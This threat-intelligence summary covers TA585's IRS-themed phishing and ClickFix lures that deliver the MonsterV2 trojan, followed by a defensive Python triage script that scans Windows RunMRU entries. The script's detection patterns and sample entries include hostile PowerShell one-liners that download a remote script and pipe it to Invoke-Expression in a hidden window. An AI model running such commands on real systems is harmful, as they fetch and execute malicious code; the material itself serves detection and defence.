
"Phishing campaigns distributing the malware have been observed using U.S. Internal Revenue Service (IRS) themed lures to trick users into clicking on fake URLs that direct to a PDF, which, in turn, links to a web page employing the ClickFix social engineering tactic to activate the infection by running a malicious command in the Windows Run dialog or PowerShell terminal. The PowerShell command is designed to execute a next-stage PowerShell script that deploys MonsterV2."
"The Proofpoint Threat Research Team described the threat activity cluster as sophisticated, leveraging web injections and filtering checks as part of its attack chains. "TA585 is notable because it appears to own its entire attack chain with multiple delivery techniques," researchers Kyle Cucci, Tommy Madjar, and Selena Larson said. "Instead of leveraging other threat actors - like paying for distribution, buying access from initial access brokers, or using a third-party traffic delivery system - TA585 manages its own infrastructure, delivery, and malware installation.""
TA585 operates a self-owned attack chain that manages infrastructure, delivery, and malware installation without outsourcing distribution. The actor transitioned from distributing Lumma Stealer to deploying MonsterV2, a remote access trojan, stealer, and loader advertised on criminal forums in February 2025 and also called Aurotun Stealer. Campaigns use IRS-themed phishing lures to direct victims to PDFs that link to pages employing the ClickFix social engineering tactic, triggering malicious commands via the Windows Run dialog or PowerShell. April 2025 waves added malicious JavaScript injections on legitimate sites that present fake CAPTCHA overlays and deliver MonsterV2 through PowerShell execution.
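The chain above ends with a victim pasting a command into the Windows Run dialog, which Windows records under the per-user RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, each slot stored as the typed text followed by "\1", ordered by the MRUList value). The triage helper below is an added example written for this summary, not code from Proofpoint, The Hacker News, or the TA585 campaign: it takes an exported RunMRU mapping, orders the entries most-recent-first, and flags PowerShell launches carrying generic loader traits (hidden window, encoded or bypass flags, in-line download piped to Invoke-Expression). The indicator patterns are general PowerShell-loader heuristics, not signatures from the actual MonsterV2 commands, which the article does not publish; the sample registry values and the base64 blob are constructed for the example.

```python
"""Triage helper for ClickFix-style lures: flags Run-dialog (RunMRU) entries that
launch PowerShell with the traits of a pasted loader one-liner. Added example;
assumes a RunMRU export presented as a plain dict of value-name -> string."""
import re
from dataclasses import dataclass, field

# Generic PowerShell-loader heuristics (assumption: not TA585-specific signatures).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "bypass_policy": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "download": re.compile(
        r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|curl)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "url": re.compile(r"https?://\S+", re.I),
    "lolbin": re.compile(r"\b(?:mshta|cscript|wscript|rundll32)\b", re.I),
}
# Only entries that launch one of these hosts are scored at all.
LAUNCHER = re.compile(r"\b(?:powershell|pwsh|cmd|mshta)(?:\.exe)?\b", re.I)

# Constructed sample RunMRU export (invented values, MRUList = most recent first).
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "calc.exe\\1",
    "c": 'powershell -w hidden -c "iwr http://example.invalid/verify.ps1 | iex"\\1',
    "d": "powershell -ep bypass -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA\\1",  # placeholder base64
}


@dataclass
class Finding:
    slot: str
    command: str
    indicators: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        # Crude banding: three or more traits together is rarely benign admin use.
        n = len(self.indicators)
        return "high" if n >= 3 else "medium" if n == 2 else "low"


def score_command(command: str) -> list[str]:
    """Return the indicator names present in one Run-dialog command ([] if not a launcher)."""
    if not LAUNCHER.search(command):
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


def parse_runmru(values: dict) -> list[tuple[str, str]]:
    """Order slots most-recent-first via MRUList and strip the trailing '\\1' marker."""
    ordered = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        ordered.append((slot, raw[:-2] if raw.endswith("\\1") else raw))
    return ordered


def triage_runmru(values: dict) -> list[Finding]:
    """Scan an exported RunMRU mapping and return flagged entries in MRU order."""
    findings = []
    for slot, cmd in parse_runmru(values):
        hits = score_command(cmd)
        if hits:
            findings.append(Finding(slot, cmd, hits))
    return findings


if __name__ == "__main__":
    for f in triage_runmru(SAMPLE_RUNMRU):
        print(f"[{f.severity}] slot {f.slot}: {f.command}")
        print("    indicators:", ", ".join(f.indicators))
```

On a live host the same mapping can be produced by reading the RunMRU key with the winreg module and feeding the resulting dict to triage_runmru; the heuristics deliberately stay coarse so that an analyst reviews each hit rather than auto-blocking on it, since legitimate administrators also use hidden windows and encoded commands.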
Read at The Hacker News